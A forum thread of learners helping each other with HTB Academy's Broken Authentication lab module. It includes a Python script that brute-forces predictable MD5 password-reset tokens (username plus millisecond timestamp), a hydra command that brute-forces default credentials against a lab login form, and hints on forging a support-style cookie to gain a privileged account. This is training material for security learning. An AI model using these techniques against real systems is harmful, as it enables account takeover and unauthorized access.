BROKEN AUTHENTICATION module | HTB Academy

I’m stucking “Predictable Reset Token” section !
Who can guide me to practice it, please ? Thanks

question 1: Create a token on the web application exposed at subdirectory /question1/ using the Create a reset token for htbuser button. Within an interval of ±1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the “Check” button. What is the flag?

Hint: Convert the displayed date to epoch time in milliseconds and use it in the script you will create.

I know the token will be generate by “username and time” then hash by md5, like the Apache OpenMeeting bug. CVE-2016-0783
but I convert datetime to epoch time, and I’m still get wrong token !

I’m with you. I would love some help with this

I’m banging my head against the wall with this one. I need serious help. I made an md5 hash of the username + the time in epoch in miliseconds just like the hint says and it doesn’t match the displayed token. Does anyone have a hint?

Does anyone have a hint, please?

I am now at the same point. Anybody was able to progress?

I just skipped it. I tried every combo of htbstudent with every permutation of epoctime, tried switching them, tried putting a colon in between them, switching them. I wrote multiple python scripts doing random things like taking the date.date() and datetime.datetime(…).timestamp() * 1000. I can’t get it to work.

Use a python script! “now = round (time.time () * 1000)” is the right way and don’t forget the + -1 second for the htbadmin token!

I solved it! The key is to brute-force every possible timestamp within that 2 seconds

I still can’t get it. Here is my script. Where did I go wrong? #! /usr/bin/python3 import time import datetime import requests from hashlib import md5 headers = {“User-Agent”: “Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0”, “Accept”: “text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8”, “Content-Type”: “application/x-www-form-urlencoded”} url = “http://46.101.14.69:30865/question1/” data = ‘submit=htbuser’ res1 = requests.post(url, headers=headers, data=data) mytime = round(time.time() * 1000) user = “htbadmin” for time in range(mytime - 1000, mytime + 1000): raw_data = user + str(time) encoded = md5(raw_data.encode()) token = encoded.hexdigest() data = “token={token}&submit=check” res = requests.post(url, data=data, headers=headers) if “Wrong token.” in res.text: print(f"checking: {time}") continue else: print(res.text) break

You have misunderstood how the token for “htbadmin” is generated. When you click on “create reset token for htbuser”, let’s say the timestamp at this moment is T, then the server generates the token for "htbadmin"using timestamp within the range of [T-1000, T+1000] Therefore, you are supposed to use the time displayed on the webpage instead of the current timestamp. PS. There is another issue within your code that could stop you find the correct token. I will leave it for you to figure out for now

Some one solve Broken Authentication Skill Assessment?

Thanks! The only problem is that the time displayed on the page is the exact same time as the header (which is why i used it). I’ll look through the rest of my code for the other problem Type your comment> @OceanicSix said: > You have misunderstood how the token for “htbadmin” is generated. > > When you click on “create reset token for htbuser”, let’s say the timestamp at this moment is T, then the server generates the token for "htbadmin"using timestamp within the range of [T-1000, T+1000] > > Therefore, you are supposed to use the time displayed on the webpage instead of the current timestamp. > > PS. There is another issue within your code that could stop you find the correct token. I will leave it for you to figure out for now

Question 1 key is not using the time printed, but converting it to your own local time

I’m stucking “Default Credentials”

question
“”"
Inspect the login page and perform a bruteforce attack. What is the valid username?
“”"

hydra -C /opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 46.101.23.188 -s 31420 http-post-form “/:Username=^USER^&Password=^PASS^:F=<button type=“submit””

I don’t know what the problem is.

Error List or parameter?

Does anyone give me a hint?

Thanks

“CRTL + U” to view page source, and googling the title information!

Working on it but not resolved for a few days. Just found that there are some old accounts as mentioned in “Support” page. Just guess the old accounts have less security control and will going to try it. If you have resolved the question. Do you mind to PM me some hints?

Thanks a lot.

I got the password for some support account but when I login with those account I did not see any admin panel access. I just see one difference mentioned that there is no ticket assigned to the support… using small directory brute force there is no extra folder or page found…believe this is the right direction

We completed this module, if you guys need a help for it, just text me

Working on the final assessment here.
I figure that there is an account username that can be targeted.
So I prepared a list of passwords from rockyou.txt that fit the password criteria (20 characters, starting with uppercase, ending with digit, etc).
Bruteforcing the password does not work tho due to timeout.

Did you manually tried all the passwords?

I found some other high privilege user. With the cookie format of support, I can change my cookie to make myself as privilege user to get the flag